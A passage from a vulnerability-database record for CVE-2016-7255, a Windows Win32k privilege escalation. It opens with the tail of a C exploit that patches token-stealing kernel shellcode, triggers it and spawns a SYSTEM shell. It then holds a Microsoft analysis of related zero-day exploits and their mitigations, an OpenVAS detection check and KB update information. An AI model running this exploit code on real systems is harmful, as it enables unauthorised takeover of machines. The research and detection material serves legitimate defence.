*/\r\n\tchar *p = shellcode;\r\n\tp += 4; // skip the CLI, PUSHF and MOV RAX bytes\t\r\n\t*(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1\r\n\r\n\tp += 12; // Patch shellcode with original value in the Overwrite address\r\n\t*(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset);\r\n\r\n\tp += 12; // To patch the PID of our process\r\n\t\r\n\t*(DWORD *)p = (DWORD)pid;\r\n \r\n p += 17;\r\n *(unsigned char *)p = (unsigned char)sc_KPROCESS;\r\n \r\n p += 7;\r\n *(unsigned int *)p = (unsigned int)sc_APLINKS;\r\n \r\n p += 20;\r\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\r\n \r\n p += 20;\r\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\r\n \r\n UINT64 shellcode_va = store_shellcode_in_hal();\r\n\tprintf(\"[+] w00t: Shellcode stored at: %llx\\n\", shellcode_va);\r\n\toverwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset);\r\n\t\r\n\tif (osversion == 7){\r\n\t\t// Exploit Win7.1\r\n\t\thNtDll = LoadLibrary(\"ntdll.dll\");\r\n\r\n\t\tif (!hNtDll) {\r\n\t\t\tprintf(\"\\t\\t[-] Failed loading NtDll: 0x%X\\n\", GetLastError());\r\n\t\t\texit(EXIT_FAILURE);\r\n\t\t}\r\n\t\r\n\t\tNtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, \"NtQueryIntervalProfile\");\r\n\r\n\t\tif (!NtQueryIntervalProfile) {\r\n\t\t\tprintf(\"\\t\\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\\n\", GetLastError());\r\n\t\t\texit(EXIT_FAILURE);\r\n\t\t}\t\r\n\t\tNtQueryIntervalProfile(0x1337, &Interval);\r\n\t}\r\n\r\n\t\r\n\twhile (1) {\r\n\t\tsize = 256;\r\n\t\tGetUserName(post_username, &size);\r\n\t\tif (memcmp(post_username, pre_username, 256) != 0) break;\r\n\t}\r\n\tSleep(2000);\r\n\tsystem(\"cmd.exe\");\r\n\r\n\r\n\treturn 0;\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/41015/"}], "canvas": [{"lastseen": "2017-01-11T18:07:43", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0099", "CVE-2016-7255"], "edition": 1, 
"description": "**Name**| ms16_135 \n---|--- \n**CVE**| CVE-2016-0099 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| MS16-135 SetWindowLongPtr Vulnerability \n**Notes**| CVE Name: CVE-2016-0099 \nVENDOR: Microsoft \nNotes: \nThe vulnerable (and now patched) function is actually xxxNextWindow(), but since \nGoogle mentioned SetWindowLongPtr() in their release, we use that name here. \n \nOlder systems are definitely vulnerable, but we have developed/tested on Win10 Anniversary Update for now. \n \nRepeatability: Infinite \nReferences: ['https://technet.microsoft.com/en-us/library/security/ms16-135.aspx', 'https://security.googleblog.com/2016/10/disclosing-vulnerabilities-to-protect.html', 'http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7255'] \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7255 \n\n", "modified": "2016-11-10T02:00:09", "published": "2016-11-10T02:00:09", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms16_135", "id": "MS16_135", "type": "canvas", "title": "Immunity Canvas: MS16_135", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mmpc": [{"lastseen": "2017-06-30T15:02:20", "bulletinFamily": "blog", "cvelist": ["CVE-2016-7855", "CVE-2016-7256", "CVE-2016-7255"], "description": "Cyberattacks involving zero-day exploits happen from time to time, affecting different platforms and applications. Over the years, Microsoft security teams have been working extremely hard to address these attacks. 
While delivering innovative solutions like [Windows Defender Application Guard](<https://blogs.windows.com/msedgedev/2016/09/27/application-guard-microsoft-edge>), which provides a safe virtualized layer for the Microsoft Edge browser, and [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/Windows-ATP>), a cloud-based service that identifies breaches using data from built-in Windows 10 sensors, we are hardening the Windows platform with mitigation techniques that can stop exploits of newly discovered and even undisclosed vulnerabilities. As Terry Myerson reiterated in his [blog post](<https://blogs.technet.microsoft.com/mmpc/2016/11/01/our-commitment-to-our-customers-security/>), we take our commitment to security innovation very seriously.\n\nA key takeaway from the detonation of zero-day exploits is that each instance represents a valuable opportunity to assess how resilient a platform can be\u2014how mitigation techniques and additional defensive layers can keep cyberattacks at bay while vulnerabilities are being fixed and patches are being deployed. Because it takes time to hunt for vulnerabilities and it is virtually impossible to find all of them, such security enhancements can be critical in preventing attacks based on zero-day exploits.\n\nIn this blog, we look at two recent kernel-level zero-day exploits used by multiple activity groups. These kernel-level exploits, based on CVE-2016-7255 and CVE-2016-7256 vulnerabilities, both result in elevation of privileges. Microsoft has promptly fixed the mentioned vulnerabilities in November 2016. 
However, we are testing the exploits against mitigation techniques delivered in August 2016 with Windows 10 Anniversary Update, hoping to see how these techniques might fare against future zero-day exploits with similar characteristics.\n\n \n\n**CVE** | **Microsoft Update** | **Exploit Type** | **Mitigation in Anniversary Update** \n---|---|---|--- \nCVE-2016-7255 | [MS16-135 (Nov, 2016)](<https://technet.microsoft.com/library/security/MS16-135>) | Win32k Elevation of Privilege Exploit | Strong validation of tagWND structure \nCVE-2016-7256 | [MS16-132 (Nov, 2016)](<https://technet.microsoft.com/library/security/MS16-132>) | Open Type Font Exploit | Isolated Font Parsing (AppContainer) \nStronger validation in font parsing \n \n \n\n## CVE-2016-7255 exploit: Win32k elevation of privilege\n\nIn October 2016, the STRONTIUM attack group launched a spear-phishing campaign targeting a small number of think tanks and nongovernmental organizations in the United States. The campaign, also discussed in [the previously mentioned blog post](<https://blogs.technet.microsoft.com/mmpc/2016/11/01/our-commitment-to-our-customers-security/>), involved the use of the exploit for CVE-2016-7255 in tandem with an exploit for the Adobe Flash Player vulnerability CVE-2016-7855.\n\nThe attack group used the Flash exploit to take advantage of a use-after-free vulnerability and access targeted computers. They then leveraged the type-confusion vulnerability in _win32k.sys_ (CVE-2016-7255) to gain elevated privileges.\n\n### Abusing the tagWND.strName kernel structure\n\nIn this section, we\u2019ll go through the internals of the specific exploit for CVE-2016-7255 crafted by the attacker. We will show how mitigation techniques provided customers with preemptive protection from the exploit, even before the release of the specific update fixing the vulnerability.\n\n\n\n_Figure 1. 
Exploit and shellcode phases of this attack _\n\n \n\nModern exploits often rely on read-write (RW) primitives to achieve code execution or gain additional privileges. For this exploit, attackers acquire RW primitives by corrupting _tagWND.strName_ kernel structure. This exploit method is a trend discussed in security conferences and visible to those who investigated actual attacks. For example, we detailed similar findings in a [presentation](<https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/OhFlorio-VB2015.pdf>) about the Duqu 2.0 exploit at Virus Bulletin 2015.\n\nBy reverse engineering its code, we found that the Win32k exploit used by STRONTIUM in October 2016 reused the exact same method. The exploit, after the initial Win32k vulnerability, corrupts _tagWND.strName_ structure and uses _SetWindowTextW_ to write arbitrary content anywhere in kernel memory.\n\n\n\n_Figure 2. SetWindowTextW as a write primitive_\n\n \n\nThe exploit abuses this API call to overwrite data of current processes and copy token privileges of the _SYSTEM_. If successful, the exploit enables the victim process\u2014_iexplore.exe_, in this example\u2014to execute with elevated privileges.\n\n\n\n_Figure 3. Internet Explorer with SYSTEM privileges_\n\n \n\n### Mitigating tagWND exploits with stronger validation\n\nTo mitigate the Win32k exploit and similar exploits, the Windows Offensive Security Research Team (OSR) introduced techniques in the Windows 10 Anniversary Update that prevent abusive use of _tagWND.strName_. This mitigation performs additional checks for the base and length fields, making sure that they are in the expected virtual address ranges and are not usable for RW primitives. In our tests on Anniversary Update, exploits using this method to create an RW primitive in the kernel are ineffective. These exploits instead cause exceptions and subsequent blue screen errors.\n\n\n\n_Figure 4. 
Windows 10 Anniversary Update mitigation on a common kernel write primitive_\n\n \n\nWith the upcoming Windows 10 Creators Update, [Windows Defender ATP](<https://www.microsoft.com/en-us/WindowsForBusiness/Windows-ATP>) introduces numerous forms of generic kernel exploit detection for deeper visibility into targeted attacks leveraging zero-day exploits. Technical details about the enhanced sensor will be shared in a forthcoming blog post.\n\n## CVE-2016-7256 exploit: Open type font elevation of privilege\n\nAs early as June 2016, unidentified actors began to use an implant detected as \u201cHenkray\u201d in low-volume attacks primarily focused on targets in South Korea. Later, in November 2016, these attackers were detected exploiting a flaw in the Windows font library (CVE-2016-7256) to elevate privileges and install the Henkray backdoor on targeted computers with older versions of Windows.\n\nThe font samples found on affected computers were specifically manipulated with hardcoded addresses and data to reflect actual kernel memory layouts. This indicates the likelihood that a secondary tool dynamically generated the exploit code at the time of infiltration.\n\n\n\n_Figure 5. Auto-generation of font file with exploit_\n\n \n\nThis secondary executable or script tool, which has not been recovered, appears to prepare and drop the font exploit, calculating and preparing the hardcoded offsets needed to exploit the kernel API and the kernel structures on the targeted system. Through deep forensic inspection of the binary data found in samples, we extracted all the hardcoded offsets and ascertained the kernel version targeted by this exploit: Windows 8 64-bit.\n\n### Function table corruption for initial code execution\n\nThe font exploit uses _fa_Callbacks_ to corrupt the function table and achieve initial code execution. The callback is called from the CFF parsing function. 
The following snippet shows a corrupted _ftell_ pointer to a _nt!qsort+0x39_ location in kernel code.\n\n\n\n_Figure 6. fa_Callbacks table corruption_\n\n \n\nThe following snippet shows the code that calls the corrupt function pointer leading to a kernel ROP chain.\n\n\n\n_Figure 7. fa_Callbacks.ftell function call code_\n\n \n\nWhen the corrupted function is called, the control jumps to the first ROP gadget at nt!qsort+0x39, which adjusts stack pointer and initializes some register values from stack values.\n\n\n\n_Figure 8. First ROP gadget_\n\n \n\nAfter the first gadget, the stack points to a kernel ROP chain which calls to _ExAllocatePoolWithTag_ call to reserve shellcode memory. Another ROP gadget will copy the first 8 bytes of the stage 1 shellcode to the allocated memory.\n\n\n\n_Figure 9. Copying the stage 1 shellcode_\n\n \n\n### Shellcode and privilege escalation\n\nThe stage 1 shellcode is very small. Its main function is to copy the main body of the shellcode to newly allocated memory and run them with a JMP RAX control transfer.\n\n\n\n_Figure 10. Stage 1 shellcode_\n\n \n\nThe main shellcode runs after the copy instructions. The main shellcode\u2014also a small piece of code\u2014performs a well-known token-stealing technique. It then copies the token pointer from a SYSTEM process to the target process, achieving privilege escalation. Both the SYSTEM process and target process PIDs, as well as certain offsets for the kernel APIs needed by the shellcode, are hardcoded in the font sample.\n\n\n\n_Figure 11. Token replacement technique_\n\n \n\n### Mitigating font exploits with AppContainer\n\nWhen opening the malicious font sample on Windows 10 Anniversary Update, font parsing happens completely in AppContainer instead of the kernel. AppContainer provides an isolated sandbox that effectively prevents font exploits (among other types of exploits) from gaining escalated privileges. 
The isolated sandbox considerably reduces font parsing as an attack surface.\n\n\n\n_Figure 12. AppContainer protects against untrusted fonts in Windows 10 Anniversary Update_\n\n \n\nWindows 10 Anniversary Update also includes additional validation for font file parsing. In our tests, the specific exploit code for CVE-2016-7256 simply fails these checks and is unable to reach vulnerable code.\n\n\n\n_Figure 13. Windows 10 font viewer error_\n\n \n\n## Conclusion: Fighting the good fight with exploit mitigation and layered detection\n\nWhile fixing a single-point vulnerability helps neutralize a specific bug, Microsoft security teams continue to look into opportunities to introduce more and more mitigation techniques. Such mitigation techniques can break exploit methods, providing a medium-term tactical benefit, or close entire classes of vulnerabilities for long-term strategic impact.\n\nIn this article, we looked into recent attack campaigns involving two zero-day kernel exploits. We saw how exploit mitigation techniques in Windows 10 Anniversary Update, which was released months before these zero-day attacks, managed to neutralize not only the specific exploits but also their exploit methods. As a result, these mitigation techniques are significantly reducing attack surfaces that would have been available to future zero-day exploits.\n\nBy delivering these mitigation techniques, we are increasing the cost of exploit development, forcing attackers to find ways around new defense layers. Even the simple tactical mitigation against popular RW primitives forces the exploit authors to spend more time and resources in finding new attack routes. 
By moving font parsing code to an isolated container, we significantly reduce the likelihood that font bugs are used as vectors for privilege escalation.\n\nIn addition to the techniques mentioned in this article, Windows 10 Anniversary Update introduced [many other mitigation techniques](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>) in core Windows components and the Microsoft Edge browser, helping protect customers from entire classes of exploits for very recent and even undisclosed vulnerabilities.\n\nFor effective post-breach detection, including cover for the multiple stages of attacks described in this blog post, sign up for Windows Defender ATP. The service leverages built-in sensors to raise alerts for exploits and other attack activity, providing corresponding threat intelligence. Customers interested in the Windows Defender ATP post-breach detection solution can find more information [here](<https://www.microsoft.com/en-us/WindowsForBusiness/Windows-ATP>).\n\n_Microsoft would like to thank [KrCERT](<https://www.krcert.or.kr/>) for their collaboration in protecting customers and for providing the sample for CVE-2016-7256._\n\n \n\n_Matt Oh and Elia Florio, __Windows Defender ATP Research Team_\n\n \n\n_Updates:_\n\nJan 18, 2017 - Corrected the spelling of Henkray backdoor.", "modified": "2017-01-13T21:28:49", "published": "2017-01-13T21:28:49", "href": "https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/", "id": "MMPC:11F96360F6FFA25D4AC7028A2E9CAA9D", "title": "Hardening Windows 10 with zero-day exploit mitigations", "type": "mmpc", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-06-10T19:47:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7246", "CVE-2016-7218", "CVE-2016-7214", "CVE-2016-7255", "CVE-2016-7215"], "description": "This host is missing an 
important security\n update according to Microsoft Bulletin MS16-135", "modified": "2020-06-08T00:00:00", "published": "2016-11-09T00:00:00", "id": "OPENVAS:1361412562310809092", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809092", "type": "openvas", "title": "Microsoft Windows Kernel-Mode Drivers Multiple Vulnerabilities (3199135)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Kernel-Mode Drivers Multiple Vulnerabilities (3199135)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809092\");\n script_version(\"2020-06-08T14:40:48+0000\");\n script_cve_id(\"CVE-2016-7214\", \"CVE-2016-7215\", \"CVE-2016-7218\", \"CVE-2016-7246\",\n \"CVE-2016-7255\");\n script_bugtraq_id(92835);\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-08 14:40:48 +0000 (Mon, 08 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-11-09 10:09:34 +0530 (Wed, 09 Nov 2016)\");\n script_name(\"Microsoft Windows Kernel-Mode Drivers Multiple Vulnerabilities (3199135)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a important security\n update according to Microsoft Bulletin MS16-135\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws are due to,\n\n - A kernel Address Space Layout Randomization (ASLR) bypass error.\n\n - The windows kernel-mode driver fails to properly handle objects in memory.\n\n - The windows bowser.sys kernel-mode driver fails to properly handle objects\n in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to retrieve the memory address of a kernel object, run arbitrary code\n in kernel mode and to log on to an affected system and runs a specially crafted\n application that could exploit the vulnerabilities and take control of an\n affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 
x32/x64\n\n - Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows Server 2012/2012R2\n\n - Microsoft Windows 10 Version 1511 x32/x64\n\n - Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows 7 x32/x64 Service Pack 1 and prior\n\n - Microsoft Windows Vista x32/x64 Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 x32/x64 Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 R2 x64 Service Pack 1 and prior\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/kb/3199135\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-us/library/security/ms16-135\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(winVista:3, win7:2, win7x64:2, win2008:3, win2008r2:2, winVistax64:3, win2008x64:3,\n win2012:1, win2012R2:1, win8_1:1, win8_1x64:1, win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath){\n exit(0);\n}\n\nwinVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Win32k.sys\");\nbrVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\drivers\\Bowser.sys\");\nif(!winVer && !brVer){\n exit(0);\n}\n\nif(hotfix_check_sp(winVista:3, winVistax64:3, win2008:3, win2008x64:3) > 0)\n{\n if(version_is_less(version:winVer, test_version:\"6.0.6002.19706\"))\n {\n Vulnerable_range1 = \"Less than 
6.0.6002.19706\";\n VULN1 = TRUE ;\n }\n else if(version_in_range(version:winVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24028\"))\n {\n Vulnerable_range1 = \"6.0.6002.23000 - 6.0.6002.24028\";\n VULN1 = TRUE ;\n }\n else if(version_is_less(version:brVer, test_version:\"6.0.6002.19698\"))\n {\n Vulnerable_range2 = \"Less than 6.0.6002.19698\";\n VULN2 = TRUE ;\n }\n else if(version_in_range(version:brVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24020\"))\n {\n Vulnerable_range2 = \"6.0.6002.23000 - 6.0.6002.24020\";\n VULN2 = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0 && brVer)\n{\n if(version_is_less(version:brVer, test_version:\"6.1.7601.23567\"))\n {\n Vulnerable_range2 = \"Less than 6.1.7601.23567\";\n VULN2 = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win2012:1) > 0 && brVer)\n{\n if(version_is_less(version:brVer, test_version:\"6.2.9200.22004\"))\n {\n Vulnerable_range2 = \"Less than 6.2.9200.22004\";\n VULN2 = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0 && winVer)\n{\n if(version_is_less(version:winVer, test_version:\"6.3.9600.18524\"))\n {\n Vulnerable_range1 = \"Less than 6.3.9600.18524\";\n VULN1 = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win10:1, win10x64:1) > 0 && winVer)\n{\n if(version_is_less(version:winVer, test_version:\"10.0.10240.16384\"))\n {\n Vulnerable_range1 = \"Less than 10.0.10240.16384\";\n VULN1 = TRUE ;\n }\n else if(version_in_range(version:winVer, test_version:\"10.0.10586.0\", test_version2:\"10.0.10586.19\"))\n {\n Vulnerable_range1 = \"10.0.10586.0 - 10.0.10586.19\";\n VULN1 = TRUE ;\n }\n else if(version_in_range(version:winVer, test_version:\"10.0.14393.0\", test_version2:\"10.0.14393.446\"))\n {\n Vulnerable_range1 = \"10.0.14393.0 - 10.0.14393.446\";\n VULN1 = TRUE ;\n }\n}\n\nif(VULN1)\n{\n report = 'File checked: ' + sysPath + \"\\system32\\Win32k.sys\"+ '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' 
+ Vulnerable_range1 + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n\nelse if(VULN2)\n{\n report = 'File checked: ' + sysPath + \"\\system32\\drivers\\Bowser.sys\"+ '\\n' +\n 'File version: ' + brVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range2 + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:49:58", "bulletinFamily": "microsoft", "cvelist": ["CVE-2016-7246", "CVE-2016-7218", "CVE-2016-7214", "CVE-2016-7255", "CVE-2016-7215"], "description": "<html><body><p>Resolves a vulnerability in Windows that could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of the system.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of the affected system. <br/><br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/ms16-135\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS16-135</a>. </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important </span><br/><br/><ul class=\"sbody-free_list\"><li>All future security and non-security updates for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2 require update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-3\" target=\"_self\">2919355</a> to be installed. 
We recommend that you install update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-4\" target=\"_self\">2919355</a> on your Windows RT 8.1-based, Windows 8.1-based, or Windows Server 2012 R2-based computer so that you receive future updates. </li><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>.</li></ul></div><h2>Additional information about this security update</h2><div class=\"kb-moreinformation-section section\"><br/>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information.<br/><br/><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/help/3199135\" id=\"kb-link-6\" target=\"_self\">3199135</a> MS16-135: Security update for Windows kernel-mode drivers: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3198234\" id=\"kb-link-7\" target=\"_self\">3198234</a> MS16-135: Description of the security update for Windows kernel-mode drivers: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3194371\" id=\"kb-link-8\" target=\"_self\">3194371</a> MS16-135: Description of the security update for Windows kernel-mode drivers: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3198218\" id=\"kb-link-9\" target=\"_self\">3198218</a> MS16-131 and MS16-135: Description of the security update for Windows: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3197873\" id=\"kb-link-10\" target=\"_self\">3197873</a> November 2016 Security Only Quality Update for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2</li><li><a 
href=\"https://support.microsoft.com/help/3197874\" id=\"kb-link-11\" target=\"_self\">3197874</a> November 2016 Security Monthly Quality Rollup for Windows 8.1, and Windows Server 2012 R2</li><li><a href=\"https://support.microsoft.com/help/3197876\" id=\"kb-link-12\" target=\"_self\">3197876</a> November 2016 security only quality update for Windows Server 2012</li><li><a href=\"https://support.microsoft.com/help/3197877\" id=\"kb-link-13\" target=\"_self\">3197877</a> November 2016 Security Monthly Quality Rollup for Windows Server 2012</li><li><a href=\"https://support.microsoft.com/help/3197867\" id=\"kb-link-14\" target=\"_self\">3197867</a> November 2016 security only quality update for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a href=\"https://support.microsoft.com/help/3197868\" id=\"kb-link-15\" target=\"_self\">3197868</a> November 2016 Security Monthly Quality Rollup for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a href=\"https://support.microsoft.com/help/3198585\" id=\"kb-link-16\" target=\"_self\">3198585</a> Cumulative Update for Windows 10: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3200970\" id=\"kb-link-17\" target=\"_self\">3200970</a> Cumulative Update for Windows 10 Version 1607 and Windows Server 2016: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3198586\" id=\"kb-link-18\" target=\"_self\">3198586</a> Cumulative Update for Windows 10 Version 1511: November 8, 2016</li></ul></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Security update deployment information</span></span></div><div class=\"faq-panel-body\" 
faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><br/><br/><h4 class=\"sbody-h4\">Windows Vista (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3198234</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Vista:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3198234</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-20\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstalling updates. To uninstall an update that is installed by WUSA, click <strong class=\"uiterm\">Control Panel</strong>, and then click <span class=\"text-base\">Security</span>. 
Under <span class=\"sbody-userinput\">Windows Update</span>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3198234\" id=\"kb-link-21\" target=\"_self\">Microsoft Knowledge Base Article 3198234</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2008 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3198234</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3198234</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3198234</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" 
